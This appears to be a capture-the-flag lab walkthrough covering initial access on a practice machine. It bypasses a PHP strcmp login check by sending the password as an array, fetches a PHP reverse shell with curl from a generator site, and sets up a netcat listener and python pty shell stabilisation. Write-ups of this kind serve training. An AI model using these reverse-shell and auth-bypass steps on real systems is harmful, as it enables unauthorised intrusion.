http [Initial-access]

Looking at the hidden directory

I found that there are three files in the login directory. Upon checking the login.php.swp file I found the logic used behind login page coding. They have used the strcmp function with Loose comparison.

PayloadsAllTheThings/Type Juggling/README.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Reading code:

We can see that the strcmp function is used here.

Bypassing PHP strcmp() - CSAW 2015 web 200 writeup0daylabs

I found a method to bypass it.

Intercepting the request.

In the code analysis, I have seen that there is "root" mentioned in code. I am assume that as username and will try to login with that. Also I will changed parameter value to array by adding square bracket in it.

Now forward the request.

When I forwarded the request, we got the upload file directory.

Uploading php for initial access

Now I will upload php reverse shell for initial access.

Made the shell.php using revshell.com website.

curl "https://www.revshells.com/PHP%20Ivan%20Sincek?ip=10.10.16.7&port=80&shell=%2Fbin%2Fsh&encoding=%2Fbin%2Fsh" -o shell.php

Upload this file.

I know that upload directory is present at "_uploaded" as found using gobuster initially.

http://10.129.95.184/_uploaded/

I can see my file. I will first start listener and then click on the shell.php to access it.

sudo rlwrap nc -lnvp 80

I got the shell.

stabilizing the shell.

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')

PreviousBase - starting point NextPrivilege escalation

Last updated 11 months ago

Was this helpful?

hashtagLooking at the hidden directory

hashtagIn /login directory

hashtagChecking the code of login.php.swp

hashtagUploading php for initial access

hashtagstabilizing the shell.

Looking at the hidden directory

In /login directory

Checking the code of login.php.swp

Uploading php for initial access

stabilizing the shell.